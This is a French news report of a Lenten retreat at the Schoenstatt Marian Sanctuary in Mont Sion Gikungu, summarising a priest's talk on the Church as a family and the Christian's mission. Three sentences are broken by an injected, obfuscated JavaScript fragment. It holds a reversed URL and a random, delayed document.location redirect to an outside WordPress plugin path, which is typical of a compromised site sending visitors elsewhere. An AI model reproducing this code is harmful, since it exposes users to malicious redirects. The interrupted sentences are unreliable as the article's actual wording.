Les membres du renouveau charismatique catholique ainsi que ceux de toutes les commissions exerçant leur apostolat au Sanctuaire Marial de Schoenstatt, ont répondu ce samedi 30 mars 2019 à l’appel du rectorat, les invitant à une retraite afin qu’ils puissent mieux se préparer à la  prochaine  fête de Pâques.

Nous sommes 8heures au Mont Sion Gikungu. Un à un, les participants se dirigent dans la petite chapelle. Les un passent dans le Sanctuaire pour faire un je vous salue Marie. Les autres sur les gradins de devant l’Eglise de la Sainte Trinité font leur méditation en attendant que 9heures tombent piles.

Le Père Félicien NIMBONA recteur du Sanctuaire conférencier du jour arrive. Après la prière, il souhaite la bienvenue à tout un chacun en leurs remerciant d’avoir répondu à l’appel, car, dit-il, c’est l’ordre de l’Eglise faire une retraite avant Pâques.

Le thème comme prévu par le bureau de l’Archevêché pour les récollections d’avant Pâques est le suivant : L’identité et la mission d’un chrétien dans l’Eglise-Famille. Le prêtre a d’abord rappelé ce que c’est le carême  comme le dit le Saint Père: « c’est un moment opportun et favorable pour se renouveler spirituellement avec les instructions que nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne l’Eglise, lesquelles se basent sur la prière, le Jeûne et l’accomplissement des œuvres de charité. »

L’Eglise, une famille                                                    

Une question survient tout de suite : c’est quoi l’Eglise ? Le concile Vatican II toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la réponse : « l’Eglise de Jésus en qui nous croyons est dans l’Eglise catholique que Pierre et ses compagnons ont hérité (Mt28, 18). Cette Eglise est comme une communauté. C’est dans l’Eglise catholique où on trouve la plénitude des moyens pour accéder à la sainteté.

L’Eglise et sa vision

L’Eglise est comme une famille, le peuple de Dieu, épouse, corps du Christ. Selon le conférencier, c’est  un nom vaste avec une profonde signification. Le malheur est que nous avons un seul Sauveur et Seigneur, mais que  nous avons la haine comme caractéristique.

La vision de l’Eglise est d’après lui, la communion fraternelle et la destruction de la haine et la jalousie.

Comment comprendre l’Eglise ?

L’Eglise est une, mais fait de trois parties en communion : l’Eglise combattante, l’Eglise toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douloureuse (du purgatoire) et celle glorieuse (du ciel). Dans le mystère de l’incarnation, le Christ Jésus a ouvert la porte entre le ciel et la terre. Comme le dit le Pape François ; « l’Eglise est cette main qui fait que cette porte reste ouverte. »

L’identité du chrétien dans l’Eglise-famille

Le chrétien est dans l’Eglise enfant de Dieu par le baptême. Le baptême que nous avons reçu dans l’Eglise nous a fait enfants de Dieu, frères et sœurs du Christ et temples de l’Esprit Saint, dit le Prêtre.

La mission du chrétien dans l’Eglise-famille

La mission du chaque chrétien comme c’est dit dans cette instruction ne se résume que dans trois actes essentiels : l’annonce de l’Evangile, la profession de la foi même dans les moments de dures épreuves, et l’accomplissement des œuvres de miséricorde.

Après l’enseignement, les participants ont eu le temps de poser diverses questions et ils se disent satisfaits de l’instruction si riche, si pertinente. Le Père Félicien a terminé en les invitant à prier pour l’Eglise catholique du monde entier, qui est dans les moments difficiles aujourd’hui.

La bénédiction a clôturé le travail midi et quart.

 

Brigitte IRAKOZE

Laisser un commentaire